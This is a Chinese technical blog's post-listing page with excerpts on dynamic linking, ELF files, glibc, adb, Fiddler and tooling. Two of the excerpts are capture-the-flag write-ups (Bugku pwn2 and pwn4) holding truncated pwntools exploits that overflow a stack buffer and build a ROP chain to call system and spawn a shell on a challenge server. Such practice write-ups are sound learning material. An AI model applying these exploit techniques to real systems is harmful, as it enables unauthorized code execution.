- 博客(25)
- 资源 (5)
- 收藏
- 关注
原创 PLT延迟绑定技术
动态链接的链接工作在运行时完成,即程序开始执行时,动态链接器要先进行一次链接工作。由于程序模块之间包含了大量的函数引用,所以在程序开始执行之前,动态链接会耗费不少时间用于解决模块之间的函数引用的符号查找以及重定位。由于程序的局部性原理,在一个程序的运行的过程中,往往不是所有的函数都能用到,相反在大量的符号中,只有少部分会用到,所以如果在程序一开始的时候就把所有的函数都链接好然而最后又没有用到,这很明显是一种浪费,所以就出现的延迟绑定的概念。基本思想就是:函数不是程序运行之前就全部进行链接工作,而是在用
2020-05-31 20:20:39 675
原创 C++符号修饰与函数签名
很久以前在一个汇编源代码里包含一个函数foo,那么汇编器将它编译成目标文件以后,foo在目标文件中的相对应的符号名也是foo。当后来Unix平台和C语言出现后,已经存在了相当多的汇编编写的库和目标文件。这样就会产生一个问题,如果一个c程序要使用这些库的话,C语言不可以使用这些库中定义的函数和变量的名字作为符号名,否则将会跟现有的目标文件冲突。比如有个用汇编编写的库中定义了一个函数名为main,那么我们在C语言中就不能再定义一个main函数或者变量了。为了防止类似的符号名冲突,Unix下的C语言就规定,
2020-05-30 17:57:07 489
原创 Ubuntu新字体安装
系统字体文件:/usr/share/fonts字体配置文件目录:/etc/fonts/将字体拷贝到所在目录安装字体# 生成字体索引信息sudo mkfontscalesudo mkfontdir# 更新字体缓存sudo fc-cache
2020-05-29 10:20:55 259
原创 Bugku pwn4
找不到/bin/sh字符串,存在$0这里因为64位程序与32位不同是通过寄存器传参的思路,通过read函数溢出栈空间0x10大小,构造ROP链,调用system,通过rdi给system传参expfrom pwn import *p = remote('114.116.54.89' ,10004)rop = 0x4007d3_system = 0x400570bin_sh = 0x60111fp.recvuntil('Come on,try to pwn me')pa...
2020-05-26 16:55:45 254
原创 Bugku pwn2
pwn2题目chmod +x pwn2这里都关闭了,栈上可执行!这个程序里面直接留了后门get_shell_思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可,即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小expfrom pwn import *p = remote('114.116.54.89', '10003')payload = b'a' * (0x
2020-05-26 15:43:04 447 4
原创 ELF文件解析
编译器编译源代码后生成的文件叫做目标文件,目标文件从结构上讲,已经是编译后的可执行文件格式,只是还没有经过链接的过程,其中有些符号还没有被调整。现在PC平台主流的可执行文件格式有Windows下的PE和Linux下的ELF,它们都是COFF格式的变种。不仅仅是可执行文件,动态链接库(win下的.dll,Linux下的.so)以及静态链接库(win下的.lib,Linux下的.a)都按照可执行文件格式存储。通常c语言编译后机器代码保存在.text段,已初始化的全局变量和局部静态变量保存在.data段,未
2020-05-26 14:32:54 313
原创 什么是libc与glibc?
官方地址:http://www.gnu.org/software/libc/libc.htmlglibc是linux系统的核心库,提供关键的API。glibc是linux下面c标准库的实现,即GNU C Library。glibc本身是GNU旗下的C标准库,后来逐渐成为了Linux的标准c库,而Linux下原来的标准c库Linux libc逐渐不再被维护。libc和glibc都是C的标准实现库,只是在Linux中glibc已经取代了libc,通常在Linux中所说的libc就是指glibc查看lib
2020-05-26 09:22:45 1877
原创 Xshell6与Xftp6教育版下载(免费)
官网:https://www.netsarang.com/zh/下面提供的链接是免费教育版https://wws.lanzous.com/iiFEakw4ikj链接:https://pan.baidu.com/s/1vIbunzl2HqgRWJ_G7eyapA 提取码:fctz
2020-05-21 14:35:48 3786
原创 Linux命令diff与patch
用法:diff [OPTION] ...文件逐行比较FILES。长选项的强制性参数对于短选项也是必需的。 --normal输出普通差异(默认) -q,--brief仅在文件不同时报告 -s,-report-identical-files报告两个文件相同的时间 -c,-C NUM,-context [= NUM]输出已复制上下文的NUM(默认3行)行 -...
2020-05-20 11:28:07 251
原创 Vmware进行Windows系统内核调试(WinDbg、WinDbg Preview)
下载:https://down.52pojie.cn/Tools/Debuggers/配置vmwarehttps://www.microsoft.com/zh-cn/p/windbg-preview/9pgjgd53tn86?rtc=1&activetab=pivot:regionofsystemrequirementstab.sympath F:\symbol参考:https://blog.51cto.com/14317856/2410156https://download.c
2020-05-19 23:12:21 2355
原创 关于win10重新安装应用商店(Microsoft Store)的解决方案
Get-AppxPackage -allusers | Select Name, PackageFullNameAdd-appxpackage -register "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11811.1001.18.0_x64__8wekyb3d8bbwe\appxmanifest.xml" -disabledevelopmentmode
2020-05-19 22:47:34 8048 3
原创 win32API中文参考手册
中文在线手册:http://www.yfvb.com/help/win32sdk/下面也是中文手册chm版,排版不是很好蓝奏云下载:https://wws.lanzous.com/iw8E3fhlz5icsdn下载:https://download.csdn.net/download/weixin_43833642/12434848[会自动长积分]如果是初学,上面的api勉强够用,建议参考着原版英文一起学习!最后如果帮到你可以点个赞!感谢!...
2020-05-18 14:52:15 41015 6
原创 一文解读编码问题(关于ASCII,Unicode,UTF-8,GB2312,GBK,UTF-16)
拉丁文的字母约公元前7世纪~前6世纪时,由希腊字母间接发展而来,成为古罗马人的文字,古罗马灭亡前共包含23个字母,其中有18个辅音字母B、C、D、F、G、Z、H、K、L、M、N、P、Q、R、S、T、X、Y,4个元音字母A、E、I、O,和一个音值不定的V,11世纪时增加了J、U、W,形成了今天的26个字母。...
2020-05-18 12:55:49 314
原创 一些常用的css选择器
选择所有节点#container 选择id为container的节点.container 选择所有class包含container的节点li a 选取所有li 下所有a节点ul + p 选取ul后面的第一个p元素div#container > ul 选取id为container的d...
2020-05-16 18:09:55 182
原创 Fiddler抓取IOS流量
配置Fiddler配置好以后重启Fiddler查看电脑IP配置终端访问192.168.0.2:8888,Fiddler默认是8888端口点击FiddlerRoot certificate安装证书配置代理,这里注意需要手机和电脑在同一个局域网内!点击配置代理输入服务器和端口后点击存储最后还要信任证书打开关于手机打开证书信任设置将DO_ NOT_ TRUST FiddlerRoot选上即可抓取IOS终端流量!...
2020-05-15 14:15:56 661
原创 Firefox浏览器历史版本下载
下载地址:http://ftp.mozilla.org/pub/firefox/releases/好处不仅可以安装历史版本而且可以自定义安装目录!官网下载地址:http://www.firefox.com.cn/默认下载最新版!是不可更改安装目录,即默认安装在C盘!...
2020-05-12 13:33:13 551
原创 PyQt5通过pyinstaller打包成可执行文件以及图标不生效问题的解决方案
python打包exepip install pyinstaller带图标打包pyinstaller -F -i test.ico test.py这里要注意路径!
2020-05-07 18:16:13 5018 1
原创 adb命令
# 查看设备adb devices# 进入指定的设备adb -s <some> shelladb shell# 获取安卓版本getprop ro.build.version.release# 获取设备型号getprop ro.prodect.model# 获取产商名称getprop ro.product.brand# 获取序列号getprop ro.serialno# 获取系统api版本getprop ro.build.version.sdkadb
2020-05-06 16:59:58 686
原创 Appium自动化测试基本配置
pipenv install appium-python-client官网:http://appium.io/下载地址:https://github.com/appium/appium-desktop/releases/tag/v1.15.1提示:这里建议复制对应的文件名以及版本号去百度找一下资源,因为github你懂的,非常慢,所以建议其他下载方式!当然这是官方发布最新的消息!这里贴...
2020-05-06 16:50:54 256
zh-hans_windows_xp_professional_with_service_pack_3_x86(包含符号表).zip
2021-01-31
arm指令集及汇编.zip
2020-08-10
LibcSearcher.zip
2020-06-09
win32APi(中文版).zip
2020-05-18
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人